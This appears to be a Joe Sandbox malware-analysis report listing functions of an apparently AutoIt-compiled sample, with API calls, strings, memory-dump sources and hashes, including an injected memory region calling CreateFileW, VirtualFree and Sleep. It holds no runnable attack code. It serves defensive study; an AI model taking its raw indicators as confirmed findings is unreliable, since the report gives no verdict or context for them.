Opcode ID: 47c5c7f36bfe3f83edfe4e84ebff3390f9584f2e1358abe3fa59c89816c14140
Instruction ID: eda1fa873b5499b9b23fc4e189178c1c78c4b8ac3e8e957acf8050c0a9e8ad68
Opcode Fuzzy Hash: 47c5c7f36bfe3f83edfe4e84ebff3390f9584f2e1358abe3fa59c89816c14140
Instruction Fuzzy Hash: C8E0D8324149046752106B3CEC0D4FE779DEE05335F108715F935D11D0EB78590095D9

Function 006A09D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006A0A5B
timeGetTime.WINMM ref: 006A0D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006A0E53
Sleep.KERNEL32(0000000A), ref: 006A0E61
LockWindowUpdate.USER32(00000000,?,?), ref: 006A0EFA
DestroyWindow.USER32 ref: 006A0F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006A0F20
Sleep.KERNEL32(0000000A,?,?), ref: 006D4E83
TranslateMessage.USER32(?), ref: 006D5C60
DispatchMessageW.USER32(?), ref: 006D5C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006D5C82

Strings

pbu, xrefs: 006D4FAE
@TRAY_ID, xrefs: 006D578F
@GUI_CTRLHANDLE, xrefs: 006D4FE4
@COM_EVENTOBJ, xrefs: 006D54F0
pbu, xrefs: 006D5003
@GUI_CTRLID, xrefs: 006D4F3A
pbu, xrefs: 006D4F59
@GUI_WINHANDLE, xrefs: 006D4F8F
pbu, xrefs: 006D57B4

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbu$pbu$pbu$pbu
API String ID: 4212290369-2982233261
Opcode ID: cb3d1331c9cc01f028af5589d2e4a5f475e165da3ce965067b7d1d59ccaa0bc0
Instruction ID: 78579c9bac579aa5e243ab4b440e0e927fad10775712c8ec3ffc75c86059a65c
Opcode Fuzzy Hash: cb3d1331c9cc01f028af5589d2e4a5f475e165da3ce965067b7d1d59ccaa0bc0
Instruction Fuzzy Hash: BAB2E270A08741DFEB24DF24C884BAAB7E6BF85304F14891EE44A977A1CB75EC45CB46

Function 006F9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006F8F5F: __time64.LIBCMT ref: 006F8F69

Part of subcall function 00694EE5: _fseek.LIBCMT ref: 00694EFD

__wsplitpath.LIBCMT ref: 006F9234

Part of subcall function 006B40FB: __wsplitpath_helper.LIBCMT ref: 006B413B

_wcscpy.LIBCMT ref: 006F9247
_wcscat.LIBCMT ref: 006F925A
__wsplitpath.LIBCMT ref: 006F927F
_wcscat.LIBCMT ref: 006F9295
_wcscat.LIBCMT ref: 006F92A8

Part of subcall function 006F8FA5: _memmove.LIBCMT ref: 006F8FDE
Part of subcall function 006F8FA5: _memmove.LIBCMT ref: 006F8FED

_wcscmp.LIBCMT ref: 006F91EF

Part of subcall function 006F9734: _wcscmp.LIBCMT ref: 006F9824
Part of subcall function 006F9734: _wcscmp.LIBCMT ref: 006F9837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006F9452
_wcsncpy.LIBCMT ref: 006F94C5
DeleteFileW.KERNEL32(?,?), ref: 006F94FB
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 006F9511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006F9522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006F9534

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: cd7d9365a10497b90e26971dd4d2510a4981b877315d328b22195e8ee29163db
Instruction ID: 914c01c2ecef9600c7b595da7c7ebdd2bb31c4ed84bf33fa6da96f19f54a72c3
Opcode Fuzzy Hash: cd7d9365a10497b90e26971dd4d2510a4981b877315d328b22195e8ee29163db
Instruction Fuzzy Hash: 99C12CB1D0021DAADF61DF95CC85EEEB7BEEF85310F0040AAF609E6151DB309A858F65

Function 00693015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00693074
RegisterClassExW.USER32(00000030), ref: 0069309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006930AF
InitCommonControlsEx.COMCTL32(?), ref: 006930CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006930DC
LoadIconW.USER32(000000A9), ref: 006930F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00693101

Strings

+, xrefs: 0069305D
TaskbarCreated, xrefs: 006930A4
AutoIt v3 GUI, xrefs: 00693090
0, xrefs: 00693056

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 084b4eba7ab75e4657733079cb2d9a97059d2930cb719578c6e3d3e9e827f74c
Instruction ID: 0816c747a8bbb78398a526b5a371422719e8952a91136cafd4beebd8e33baf3f
Opcode Fuzzy Hash: 084b4eba7ab75e4657733079cb2d9a97059d2930cb719578c6e3d3e9e827f74c
Instruction Fuzzy Hash: 4C3148B1805348AFDB00CFA8D889AD9BFF4FB09310F14816EE580E62A0D3B91545CF95

Function 00693041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00693074
RegisterClassExW.USER32(00000030), ref: 0069309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006930AF
InitCommonControlsEx.COMCTL32(?), ref: 006930CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006930DC
LoadIconW.USER32(000000A9), ref: 006930F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00693101

Strings

+, xrefs: 0069305D
TaskbarCreated, xrefs: 006930A4
AutoIt v3 GUI, xrefs: 00693090
0, xrefs: 00693056

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 535eec30bd082c4000b5b305719254597c408ff77c8ed031e2c33561965d229c
Instruction ID: 23fd8a2e533820b4591dfd0d9ca48f339080642cc7c0003c9b86ece16a4552af
Opcode Fuzzy Hash: 535eec30bd082c4000b5b305719254597c408ff77c8ed031e2c33561965d229c
Instruction Fuzzy Hash: 6A21B2B1911718AFDB00DFA8EC89BDDBBF4FB08711F10C12AF914A62A0D7B955448F99

Function 0069708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00694706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007552F8,?,006937AE,?), ref: 00694724

Part of subcall function 006B050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00697165), ref: 006B052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006971A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006CE8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006CE909
RegCloseKey.ADVAPI32(?), ref: 006CE947
_wcscat.LIBCMT ref: 006CE9A0

Strings

Software\AutoIt v3\AutoIt, xrefs: 0069719E
\, xrefs: 006CE9C3
\Include\, xrefs: 00697165
Include, xrefs: 006CE8BF, 006CE900

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: c987306084b6871dc145bf412555fbed9c2f309c5f523334c0bd381b9af65820
Instruction ID: 8a43da4c5063d63a72a36e7ffa290ed1abd1cbd3780dff516341c4bec6c24c62
Opcode Fuzzy Hash: c987306084b6871dc145bf412555fbed9c2f309c5f523334c0bd381b9af65820
Instruction Fuzzy Hash: D7717D715083019ED744EF29E8419EBBBF9FF88310F80852EF445872A1EBB5D949CB5A

Function 00693633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 006936D2
KillTimer.USER32(?,00000001), ref: 006936FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0069371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0069372A
CreatePopupMenu.USER32 ref: 0069373E
PostQuitMessage.USER32(00000000), ref: 0069374D

Strings

TaskbarCreated, xrefs: 00693725
%r, xrefs: 006CD081, 006CD0CF

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%r
API String ID: 129472671-4130811174
Opcode ID: ca467d148297beb9163ad623a7797b74d33161721a171fff5d8be7a6fdb0102f
Instruction ID: 90c544d38ccb4d169c9bf3a9f5cf1feab2010c9772cda4b1d7e07691aec055fb
Opcode Fuzzy Hash: ca467d148297beb9163ad623a7797b74d33161721a171fff5d8be7a6fdb0102f
Instruction Fuzzy Hash: B24149B1200615BBDF106FA8DC29BF9379FEB01301F504139F5029A7E1CAA9AE05976E

Function 00693A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00693A50
LoadCursorW.USER32(00000000,00007F00), ref: 00693A5F
LoadIconW.USER32(00000063), ref: 00693A76
LoadIconW.USER32(000000A4), ref: 00693A88
LoadIconW.USER32(000000A2), ref: 00693A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00693AC0
RegisterClassExW.USER32(?), ref: 00693B16

Part of subcall function 00693041: GetSysColorBrush.USER32(0000000F), ref: 00693074
Part of subcall function 00693041: RegisterClassExW.USER32(00000030), ref: 0069309E
Part of subcall function 00693041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006930AF
Part of subcall function 00693041: InitCommonControlsEx.COMCTL32(?), ref: 006930CC
Part of subcall function 00693041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006930DC
Part of subcall function 00693041: LoadIconW.USER32(000000A9), ref: 006930F2
Part of subcall function 00693041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00693101

Strings

0, xrefs: 00693AF4
#, xrefs: 00693AFB
AutoIt v3, xrefs: 00693B05

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: da77127f1df0ceb8a460cdf90dd0f31d1ad4477cb6ca0a2109ef8fbcb97aba66
Instruction ID: 6144afd0c058d2e43927a4042daa50f3829cd70b6520b7c4e906f8d78ebcc792
Opcode Fuzzy Hash: da77127f1df0ceb8a460cdf90dd0f31d1ad4477cb6ca0a2109ef8fbcb97aba66
Instruction Fuzzy Hash: 292119B1D10708AFEF10DFA8EC59BDD7BB5FB08712F10812AE504A62E1D7B956508F98

Function 00693766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3ExecuteLine, xrefs: 006938A7
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 006937AE
/AutoIt3ExecuteScript, xrefs: 006938BC
Ru, xrefs: 006CD213
/AutoIt3OutputDebug, xrefs: 00693892
CMDLINERAW, xrefs: 006937FB
CMDLINE, xrefs: 00693822
/ErrorStdOut, xrefs: 0069387D

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$Ru
API String ID: 1825951767-3048454719
Opcode ID: b7a157617d69456690c4a4deda069c03083870d053e61dc82edf8f6a736bb384
Instruction ID: f11b16dd4c44c4bebeb8dfb7d89a31cdb2a5467380d84247156c6f8c0cb0d905
Opcode Fuzzy Hash: b7a157617d69456690c4a4deda069c03083870d053e61dc82edf8f6a736bb384
Instruction Fuzzy Hash: E1A16CB191022D9ADF44EBA4DC91EFEB77EBF15300F04042EE416A7691EF745A09CB64

Function 0069F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006B0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006B0193
Part of subcall function 006B0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 006B019B
Part of subcall function 006B0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006B01A6
Part of subcall function 006B0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006B01B1
Part of subcall function 006B0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 006B01B9
Part of subcall function 006B0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 006B01C1

Part of subcall function 006A60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0069F930), ref: 006A6154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0069F9CD
OleInitialize.OLE32(00000000), ref: 0069FA4A
CloseHandle.KERNEL32(00000000), ref: 006D45C8

Strings

\Tu, xrefs: 0069F7F7
R, xrefs: 0069F7EB
%r, xrefs: 0069F796, 0069F7A8, 0069F96E, 0069FA51
<Wu, xrefs: 0069F930

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <Wu$\Tu$%r$R
API String ID: 1986988660-1577227448
Opcode ID: 3388dc1e8fc8a1b75a8369daf9a55338dafbb7008f3e511a058f60e2bab3044b
Instruction ID: f7de86ec5d2b95b454b170ce7106caaec4c5387bee201342d655d67b6c041def
Opcode Fuzzy Hash: 3388dc1e8fc8a1b75a8369daf9a55338dafbb7008f3e511a058f60e2bab3044b
Instruction Fuzzy Hash: CE81BBB0911B80CF8784DF29A8616A87BE6FB98307790C53ED419CB271EBFC54858F59

Function 00D53210 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D532E1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D53507

Memory Dump Source

Source File: 00000000.00000002.2087821724.0000000000D50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_tfWjjV1LdT.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction ID: 944e65d23163f3a52efa144edfdd92cdeb4b8ef2ab16a1c7a7d449e69dcb3472
Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction Fuzzy Hash: 06A10774E00209EBDF14CFA4C894BEEBBB5FF48305F248159E901BB280D7759A85DBA5

Function 006939D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00693A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00693A24
ShowWindow.USER32(00000000,?,?), ref: 00693A38
ShowWindow.USER32(00000000,?,?), ref: 00693A41

Strings

edit, xrefs: 00693A1E
AutoIt v3, xrefs: 006939FB, 00693A00, 00693A01

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: f276a91f692d7c310fefe5913e61a41594d7ff068c6ef8cd6371ce4d6d4a3a0b
Instruction ID: a3efd29a659e2d9e3293b76a4f8fda79f463053c104f4a59d654d2f73cf332ac
Opcode Fuzzy Hash: f276a91f692d7c310fefe5913e61a41594d7ff068c6ef8cd6371ce4d6d4a3a0b
Instruction Fuzzy Hash: 32F030B05407907EEB315717AC18EA72E7DE7C6F61F008029F904A21B0C5E91840CB78

Function 00D52FD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D52EC0: Sleep.KERNELBASE(000001F4), ref: 00D52ED1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D53108

Strings

EJU6BNRJAUG3M4YWD1R7LH57, xrefs: 00D5316B, 00D5316E

Memory Dump Source

Source File: 00000000.00000002.2087821724.0000000000D50000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_tfWjjV1LdT.jbxd

Similarity

API ID: CreateFileSleep
String ID: EJU6BNRJAUG3M4YWD1R7LH57
API String ID: 2694422964-3722977972
Opcode ID: 4bf3123f9a21e78b680c3e5e23c3cd07603906340775b1e1a5ac274e18d85573
Instruction ID: 496836f30a20f7b99fccb10bc3d2dd828b0a7c7df77dc69d20d11a12b6a855b1
Opcode Fuzzy Hash: 4bf3123f9a21e78b680c3e5e23c3cd07603906340775b1e1a5ac274e18d85573
Instruction Fuzzy Hash: 4A51A330D04388DAEF11DBB4C854BEEBBB9AF15305F144198E6497B2C1D6B91B48CBB5

Function 0069407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 006CD3D7

Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06

_memset.LIBCMT ref: 006940FC
_wcscpy.LIBCMT ref: 00694150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00694160

Strings

Line: , xrefs: 006CD400

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 873ef80b615ee2295fc6c7455503b23740997aa72eeedd6df3befffcd1037d16
Instruction ID: 965c28d248d5ccaf1917d3e631ad8cff31cd777cafa78ab93d3addd74d7c64a9
Opcode Fuzzy Hash: 873ef80b615ee2295fc6c7455503b23740997aa72eeedd6df3befffcd1037d16
Instruction Fuzzy Hash: 8531EFB1008304AFDBA1EB60DC46FEB77DEAF40310F10851EF585925A1EFB4A649C78A

Function 0069686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00694DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00694E0F

_free.LIBCMT ref: 006CE263
_free.LIBCMT ref: 006CE2AA

Part of subcall function 00696A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00696BAD

Strings

Bad directive syntax error, xrefs: 006CE292
>>>AUTOIT SCRIPT<<<, xrefs: 006CE039

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 5e8bcbc529cc1a297b6d5354f82a6022464b44670516b62b341ef08fea0af6a0
Instruction ID: e0cd942a72363d419421dc136407a08592b67b5efd9239fb0ddbc583696a80f3
Opcode Fuzzy Hash: 5e8bcbc529cc1a297b6d5354f82a6022464b44670516b62b341ef08fea0af6a0
Instruction Fuzzy Hash: 5E918F71A10219AFCF04EFA4C891EFDB7BAFF04310B14442EF815AB2A1DB759A55CB54

